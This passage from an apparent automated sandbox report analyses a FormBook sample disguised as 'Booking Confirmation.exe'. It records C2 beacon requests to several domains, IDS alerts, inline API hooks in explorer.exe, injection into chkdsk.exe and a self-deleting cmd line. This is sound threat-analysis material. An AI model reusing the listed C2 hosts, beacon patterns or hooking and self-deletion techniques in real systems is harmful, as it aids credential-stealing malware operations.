.rsrc	0x7e000	0xff8	0x1000	False	0.40234375	data	5.00072933657	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x80000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x7e090	0x344	data
RT_MANIFEST	0x7e3e4	0xc0f	XML 1.0 document, UTF-8 Unicode (with BOM) text

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2018
Assembly Version	1.0.0.0
InternalName	IConnectionPoint.exe
FileVersion	1.0.0.0
CompanyName
LegalTrademarks
Comments
ProductName	RegisterVB
ProductVersion	1.0.0.0
FileDescription	RegisterVB
OriginalFilename	IConnectionPoint.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
02/23/21-09:38:51.562647	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49764	80	192.168.2.4	34.102.136.180
02/23/21-09:38:51.562647	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49764	80	192.168.2.4	34.102.136.180
02/23/21-09:38:51.562647	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49764	80	192.168.2.4	34.102.136.180
02/23/21-09:38:51.702716	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49764	34.102.136.180	192.168.2.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 23, 2021 09:37:49.125511885 CET	49759	80	192.168.2.4	81.169.149.11
Feb 23, 2021 09:37:49.178277969 CET	80	49759	81.169.149.11	192.168.2.4
Feb 23, 2021 09:37:49.178462029 CET	49759	80	192.168.2.4	81.169.149.11
Feb 23, 2021 09:37:49.178663015 CET	49759	80	192.168.2.4	81.169.149.11
Feb 23, 2021 09:37:49.232486963 CET	80	49759	81.169.149.11	192.168.2.4
Feb 23, 2021 09:37:49.254631042 CET	80	49759	81.169.149.11	192.168.2.4
Feb 23, 2021 09:37:49.254662037 CET	80	49759	81.169.149.11	192.168.2.4
Feb 23, 2021 09:37:49.254834890 CET	49759	80	192.168.2.4	81.169.149.11
Feb 23, 2021 09:37:49.254900932 CET	49759	80	192.168.2.4	81.169.149.11
Feb 23, 2021 09:37:49.307396889 CET	80	49759	81.169.149.11	192.168.2.4
Feb 23, 2021 09:38:10.061094046 CET	49760	80	192.168.2.4	185.175.200.247
Feb 23, 2021 09:38:10.113087893 CET	80	49760	185.175.200.247	192.168.2.4
Feb 23, 2021 09:38:10.113182068 CET	49760	80	192.168.2.4	185.175.200.247
Feb 23, 2021 09:38:10.113603115 CET	49760	80	192.168.2.4	185.175.200.247
Feb 23, 2021 09:38:10.165286064 CET	80	49760	185.175.200.247	192.168.2.4
Feb 23, 2021 09:38:10.166449070 CET	80	49760	185.175.200.247	192.168.2.4
Feb 23, 2021 09:38:10.166481972 CET	80	49760	185.175.200.247	192.168.2.4
Feb 23, 2021 09:38:10.166639090 CET	49760	80	192.168.2.4	185.175.200.247
Feb 23, 2021 09:38:10.166727066 CET	49760	80	192.168.2.4	185.175.200.247
Feb 23, 2021 09:38:10.218425989 CET	80	49760	185.175.200.247	192.168.2.4
Feb 23, 2021 09:38:30.565995932 CET	49763	80	192.168.2.4	156.227.187.201
Feb 23, 2021 09:38:30.916510105 CET	80	49763	156.227.187.201	192.168.2.4
Feb 23, 2021 09:38:30.918800116 CET	49763	80	192.168.2.4	156.227.187.201
Feb 23, 2021 09:38:30.918850899 CET	49763	80	192.168.2.4	156.227.187.201
Feb 23, 2021 09:38:31.270864010 CET	80	49763	156.227.187.201	192.168.2.4
Feb 23, 2021 09:38:31.277004004 CET	80	49763	156.227.187.201	192.168.2.4
Feb 23, 2021 09:38:31.277348042 CET	49763	80	192.168.2.4	156.227.187.201
Feb 23, 2021 09:38:31.277414083 CET	49763	80	192.168.2.4	156.227.187.201
Feb 23, 2021 09:38:31.627831936 CET	80	49763	156.227.187.201	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 23, 2021 09:36:33.365729094 CET	64646	53	192.168.2.4	8.8.8.8
Feb 23, 2021 09:36:33.401702881 CET	65298	53	192.168.2.4	8.8.8.8
Feb 23, 2021 09:36:33.414359093 CET	53	64646	8.8.8.8	192.168.2.4
Feb 23, 2021 09:36:33.450438023 CET	53	65298	8.8.8.8	192.168.2.4
Feb 23, 2021 09:36:34.358023882 CET	59123	53	192.168.2.4	8.8.8.8
Feb 23, 2021 09:36:34.406892061 CET	53	59123	8.8.8.8	192.168.2.4
Feb 23, 2021 09:36:35.323983908 CET	54531	53	192.168.2.4	8.8.8.8
Feb 23, 2021 09:36:35.375597000 CET	53	54531	8.8.8.8	192.168.2.4
Feb 23, 2021 09:36:36.211026907 CET	49714	53	192.168.2.4	8.8.8.8
Feb 23, 2021 09:36:36.259768009 CET	53	49714	8.8.8.8	192.168.2.4
Feb 23, 2021 09:36:37.460362911 CET	58028	53	192.168.2.4	8.8.8.8
Feb 23, 2021 09:36:37.466555119 CET	53097	53	192.168.2.4	8.8.8.8
Feb 23, 2021 09:36:37.508991003 CET	53	58028	8.8.8.8	192.168.2.4
Feb 23, 2021 09:36:37.528747082 CET	53	53097	8.8.8.8	192.168.2.4
Feb 23, 2021 09:36:49.565480947 CET	49257	53	192.168.2.4	8.8.8.8
Feb 23, 2021 09:36:49.614151955 CET	53	49257	8.8.8.8	192.168.2.4
Feb 23, 2021 09:36:50.378268003 CET	62389	53	192.168.2.4	8.8.8.8
Feb 23, 2021 09:36:50.430069923 CET	53	62389	8.8.8.8	192.168.2.4
Feb 23, 2021 09:36:51.610858917 CET	49910	53	192.168.2.4	8.8.8.8
Feb 23, 2021 09:36:51.659547091 CET	53	49910	8.8.8.8	192.168.2.4
Feb 23, 2021 09:36:52.969223022 CET	55854	53	192.168.2.4	8.8.8.8
Feb 23, 2021 09:36:53.020847082 CET	53	55854	8.8.8.8	192.168.2.4
Feb 23, 2021 09:36:53.968452930 CET	64549	53	192.168.2.4	8.8.8.8
Feb 23, 2021 09:36:54.019956112 CET	53	64549	8.8.8.8	192.168.2.4
Feb 23, 2021 09:36:54.753613949 CET	63153	53	192.168.2.4	8.8.8.8
Feb 23, 2021 09:36:54.802546024 CET	53	63153	8.8.8.8	192.168.2.4
Feb 23, 2021 09:36:56.450119972 CET	52991	53	192.168.2.4	8.8.8.8
Feb 23, 2021 09:36:56.498850107 CET	53	52991	8.8.8.8	192.168.2.4
Feb 23, 2021 09:36:58.389504910 CET	53700	53	192.168.2.4	8.8.8.8
Feb 23, 2021 09:36:58.451144934 CET	53	53700	8.8.8.8	192.168.2.4
Feb 23, 2021 09:36:59.244559050 CET	51726	53	192.168.2.4	8.8.8.8
Feb 23, 2021 09:36:59.296053886 CET	53	51726	8.8.8.8	192.168.2.4
Feb 23, 2021 09:37:00.205465078 CET	56794	53	192.168.2.4	8.8.8.8
Feb 23, 2021 09:37:00.255317926 CET	53	56794	8.8.8.8	192.168.2.4
Feb 23, 2021 09:37:07.391791105 CET	56534	53	192.168.2.4	8.8.8.8
Feb 23, 2021 09:37:07.440401077 CET	53	56534	8.8.8.8	192.168.2.4
Feb 23, 2021 09:37:19.035537958 CET	56627	53	192.168.2.4	8.8.8.8
Feb 23, 2021 09:37:19.087325096 CET	53	56627	8.8.8.8	192.168.2.4
Feb 23, 2021 09:37:20.023345947 CET	56621	53	192.168.2.4	8.8.8.8
Feb 23, 2021 09:37:20.072021961 CET	53	56621	8.8.8.8	192.168.2.4
Feb 23, 2021 09:37:21.322374105 CET	63116	53	192.168.2.4	8.8.8.8
Feb 23, 2021 09:37:21.371100903 CET	53	63116	8.8.8.8	192.168.2.4
Feb 23, 2021 09:37:22.515489101 CET	64078	53	192.168.2.4	8.8.8.8
Feb 23, 2021 09:37:22.567611933 CET	53	64078	8.8.8.8	192.168.2.4
Feb 23, 2021 09:37:28.024101019 CET	64801	53	192.168.2.4	8.8.8.8
Feb 23, 2021 09:37:28.081237078 CET	53	64801	8.8.8.8	192.168.2.4
Feb 23, 2021 09:37:31.836255074 CET	61721	53	192.168.2.4	8.8.8.8
Feb 23, 2021 09:37:31.898824930 CET	53	61721	8.8.8.8	192.168.2.4
Feb 23, 2021 09:37:33.834634066 CET	51255	53	192.168.2.4	8.8.8.8
Feb 23, 2021 09:37:33.908302069 CET	53	51255	8.8.8.8	192.168.2.4
Feb 23, 2021 09:37:34.645555973 CET	61522	53	192.168.2.4	8.8.8.8
Feb 23, 2021 09:37:34.705548048 CET	53	61522	8.8.8.8	192.168.2.4
Feb 23, 2021 09:37:35.134004116 CET	52337	53	192.168.2.4	8.8.8.8
Feb 23, 2021 09:37:35.196948051 CET	53	52337	8.8.8.8	192.168.2.4
Feb 23, 2021 09:37:35.743684053 CET	55046	53	192.168.2.4	8.8.8.8
Feb 23, 2021 09:37:35.800733089 CET	53	55046	8.8.8.8	192.168.2.4
Feb 23, 2021 09:37:36.325404882 CET	49612	53	192.168.2.4	8.8.8.8
Feb 23, 2021 09:37:36.382463932 CET	53	49612	8.8.8.8	192.168.2.4
Feb 23, 2021 09:37:36.594090939 CET	49285	53	192.168.2.4	8.8.8.8
Feb 23, 2021 09:37:36.665523052 CET	53	49285	8.8.8.8	192.168.2.4
Feb 23, 2021 09:37:36.963715076 CET	50601	53	192.168.2.4	8.8.8.8
Feb 23, 2021 09:37:37.012460947 CET	53	50601	8.8.8.8	192.168.2.4
Feb 23, 2021 09:37:37.777667046 CET	60875	53	192.168.2.4	8.8.8.8
Feb 23, 2021 09:37:37.836175919 CET	53	60875	8.8.8.8	192.168.2.4
Feb 23, 2021 09:37:38.772792101 CET	56448	53	192.168.2.4	8.8.8.8
Feb 23, 2021 09:37:38.831108093 CET	53	56448	8.8.8.8	192.168.2.4
Feb 23, 2021 09:37:39.264177084 CET	59172	53	192.168.2.4	8.8.8.8
Feb 23, 2021 09:37:39.322266102 CET	53	59172	8.8.8.8	192.168.2.4
Feb 23, 2021 09:37:46.320043087 CET	62420	53	192.168.2.4	8.8.8.8
Feb 23, 2021 09:37:46.378277063 CET	53	62420	8.8.8.8	192.168.2.4
Feb 23, 2021 09:37:49.056421041 CET	60579	53	192.168.2.4	8.8.8.8
Feb 23, 2021 09:37:49.118174076 CET	53	60579	8.8.8.8	192.168.2.4
Feb 23, 2021 09:38:09.971204042 CET	50183	53	192.168.2.4	8.8.8.8
Feb 23, 2021 09:38:10.059891939 CET	53	50183	8.8.8.8	192.168.2.4
Feb 23, 2021 09:38:21.682096004 CET	61531	53	192.168.2.4	8.8.8.8
Feb 23, 2021 09:38:21.730724096 CET	53	61531	8.8.8.8	192.168.2.4
Feb 23, 2021 09:38:23.595087051 CET	49228	53	192.168.2.4	8.8.8.8
Feb 23, 2021 09:38:23.652355909 CET	53	49228	8.8.8.8	192.168.2.4
Feb 23, 2021 09:38:30.350929976 CET	59794	53	192.168.2.4	8.8.8.8
Feb 23, 2021 09:38:30.564515114 CET	53	59794	8.8.8.8	192.168.2.4
Feb 23, 2021 09:38:51.433300018 CET	55916	53	192.168.2.4	8.8.8.8
Feb 23, 2021 09:38:51.520318985 CET	53	55916	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 23, 2021 09:37:49.056421041 CET	192.168.2.4	8.8.8.8	0x589e	Standard query (0)	www.buehne.cloud	A (IP address)	IN (0x0001)
Feb 23, 2021 09:38:09.971204042 CET	192.168.2.4	8.8.8.8	0x43ad	Standard query (0)	www.praktijkinfinity.online	A (IP address)	IN (0x0001)
Feb 23, 2021 09:38:30.350929976 CET	192.168.2.4	8.8.8.8	0x312	Standard query (0)	www.localmoversuae.com	A (IP address)	IN (0x0001)
Feb 23, 2021 09:38:51.433300018 CET	192.168.2.4	8.8.8.8	0xcc80	Standard query (0)	www.merzigomusic.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Feb 23, 2021 09:37:49.118174076 CET	8.8.8.8	192.168.2.4	0x589e	No error (0)	www.buehne.cloud	buehne.cloud		CNAME (Canonical name)	IN (0x0001)
Feb 23, 2021 09:37:49.118174076 CET	8.8.8.8	192.168.2.4	0x589e	No error (0)	buehne.cloud		81.169.149.11	A (IP address)	IN (0x0001)
Feb 23, 2021 09:38:10.059891939 CET	8.8.8.8	192.168.2.4	0x43ad	No error (0)	www.praktijkinfinity.online		185.175.200.247	A (IP address)	IN (0x0001)
Feb 23, 2021 09:38:30.564515114 CET	8.8.8.8	192.168.2.4	0x312	No error (0)	www.localmoversuae.com		156.227.187.201	A (IP address)	IN (0x0001)
Feb 23, 2021 09:38:51.520318985 CET	8.8.8.8	192.168.2.4	0xcc80	No error (0)	www.merzigomusic.com	merzigomusic.com		CNAME (Canonical name)	IN (0x0001)
Feb 23, 2021 09:38:51.520318985 CET	8.8.8.8	192.168.2.4	0xcc80	No error (0)	merzigomusic.com		34.102.136.180	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.buehne.cloud

www.praktijkinfinity.online

www.localmoversuae.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49759	81.169.149.11	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 09:37:49.178663015 CET	5031	OUT	GET /ffw/?MZg8=i2wbx/M7rrWGhnBeYdMUQ+oEsm11dU48NWkvE2U6RCUjjqrjMq6tqVdU8V2lO/H9m4oS&uTxXc=ojO0dJK0Hv HTTP/1.1 Host: www.buehne.cloud Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 23, 2021 09:37:49.254631042 CET	5033	IN	HTTP/1.1 302 Found Date: Tue, 23 Feb 2021 08:37:49 GMT Server: Apache/2.4.29 (Ubuntu) Location: https://buehne.cloud/ffw/?MZg8=i2wbx/M7rrWGhnBeYdMUQ+oEsm11dU48NWkvE2U6RCUjjqrjMq6tqVdU8V2lO/H9m4oS&uTxXc=ojO0dJK0Hv Content-Length: 386 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 75 65 68 6e 65 2e 63 6c 6f 75 64 2f 66 66 77 2f 3f 4d 5a 67 38 3d 69 32 77 62 78 2f 4d 37 72 72 57 47 68 6e 42 65 59 64 4d 55 51 2b 6f 45 73 6d 31 31 64 55 34 38 4e 57 6b 76 45 32 55 36 52 43 55 6a 6a 71 72 6a 4d 71 36 74 71 56 64 55 38 56 32 6c 4f 2f 48 39 6d 34 6f 53 26 61 6d 70 3b 75 54 78 58 63 3d 6f 6a 4f 30 64 4a 4b 30 48 76 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 62 75 65 68 6e 65 2e 63 6c 6f 75 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://buehne.cloud/ffw/?MZg8=i2wbx/M7rrWGhnBeYdMUQ+oEsm11dU48NWkvE2U6RCUjjqrjMq6tqVdU8V2lO/H9m4oS&uTxXc=ojO0dJK0Hv">here</a>.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.buehne.cloud Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49760	185.175.200.247	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 09:38:10.113603115 CET	6257	OUT	GET /ffw/?MZg8=QtqTw2GyYxf2WyRFtpmSmJJvhnrw03uNROtSydYnJk3JDRiYk6bsvXWgtuf5tlEJcMN+&uTxXc=ojO0dJK0Hv HTTP/1.1 Host: www.praktijkinfinity.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 23, 2021 09:38:10.166449070 CET	6258	IN	HTTP/1.1 404 Not Found Date: Tue, 23 Feb 2021 08:38:10 GMT Server: Apache/2 Upgrade: h2,h2c Connection: Upgrade, close Accept-Ranges: bytes Vary: Accept-Encoding,User-Agent Transfer-Encoding: chunked Content-Type: text/html Data Raw: 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 0d 0a 38 62 0d 0a 2f 66 66 77 2f 3f 4d 5a 67 38 3d 51 74 71 54 77 32 47 79 59 78 66 32 57 79 52 46 74 70 6d 53 6d 4a 4a 76 68 6e 72 77 30 33 75 4e 52 4f 74 53 79 64 59 6e 4a 6b 33 4a 44 52 69 59 6b 36 62 73 76 58 57 67 74 75 66 35 74 6c 45 4a 63 4d 4e 2b 26 61 6d 70 3b 75 54 78 58 63 3d 6f 6a 4f 30 64 4a 4b 30 48 76 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 48 52 3e 0a 3c 49 3e 0d 0a 31 32 62 0d 0a 77 77 77 2e 70 72 61 6b 74 69 6a 6b 69 6e 66 69 6e 69 74 79 2e 6f 6e 6c 69 6e 65 3c 2f 49 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 90<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL 8b/ffw/?MZg8=QtqTw2GyYxf2WyRFtpmSmJJvhnrw03uNROtSydYnJk3JDRiYk6bsvXWgtuf5tlEJcMN+&uTxXc=ojO0dJK0Hv was not found on this server.<HR><I>12bwww.praktijkinfinity.online</I></BODY></HTML>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49763	156.227.187.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 09:38:30.918850899 CET	6278	OUT	GET /ffw/?MZg8=vCSLLgJGCp79MzLYydBa+Bsk3bm2BxHz5ofTxOlO5FwRAAdXOpMXkN2jq+v+BBk+R2pe&uTxXc=ojO0dJK0Hv HTTP/1.1 Host: www.localmoversuae.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x8F 0xFE 0xE0
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x87 0x7E 0xE0
GetMessageW	INLINE	0x48 0x8B 0xB8 0x87 0x7E 0xE0
GetMessageA	INLINE	0x48 0x8B 0xB8 0x8F 0xFE 0xE0

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Booking Confirmation.exe PID: 7100 Parent PID: 5844

General

Start time:	09:36:40
Start date:	23/02/2021
Path:	C:\Users\user\Desktop\Booking Confirmation.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Booking Confirmation.exe'
Imagebase:	0x2c0000
File size:	510976 bytes
MD5 hash:	78D9EADC9FCC580239B360FFA2C2220F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.671285373.0000000003599000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.671285373.0000000003599000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.671285373.0000000003599000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: Booking Confirmation.exe PID: 3716 Parent PID: 7100

General

Start time:	09:36:50
Start date:	23/02/2021
Path:	C:\Users\user\Desktop\Booking Confirmation.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\Booking Confirmation.exe
Imagebase:	0x2d0000
File size:	510976 bytes
MD5 hash:	78D9EADC9FCC580239B360FFA2C2220F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: Booking Confirmation.exe PID: 612 Parent PID: 7100

General

Start time:	09:36:50
Start date:	23/02/2021
Path:	C:\Users\user\Desktop\Booking Confirmation.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Booking Confirmation.exe
Imagebase:	0xdc0000
File size:	510976 bytes
MD5 hash:	78D9EADC9FCC580239B360FFA2C2220F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.709997867.0000000001500000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.709997867.0000000001500000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.709997867.0000000001500000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.709963590.00000000014D0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.709963590.00000000014D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.709963590.00000000014D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3424 Parent PID: 612

General

Start time:	09:36:52
Start date:	23/02/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: chkdsk.exe PID: 5072 Parent PID: 3424

General

Start time:	09:37:05
Start date:	23/02/2021
Path:	C:\Windows\SysWOW64\chkdsk.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\chkdsk.exe
Imagebase:	0x2e0000
File size:	23040 bytes
MD5 hash:	2D5A2497CB57C374B3AE3080FF9186FB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.912607132.0000000004920000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.912607132.0000000004920000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.912607132.0000000004920000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.912770256.0000000004A80000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.912770256.0000000004A80000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.912770256.0000000004A80000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 7024 Parent PID: 5072

General

Start time:	09:37:10
Start date:	23/02/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\Booking Confirmation.exe'
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6952 Parent PID: 7024

General

Start time:	09:37:11
Start date:	23/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Booking Confirmation.exe PID: 7100 Parent PID: 5844 Booking Confirmation.exeCOMMON

Executed Functions

Function 0247BBC8, Relevance: 1.7, APIs: 1, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

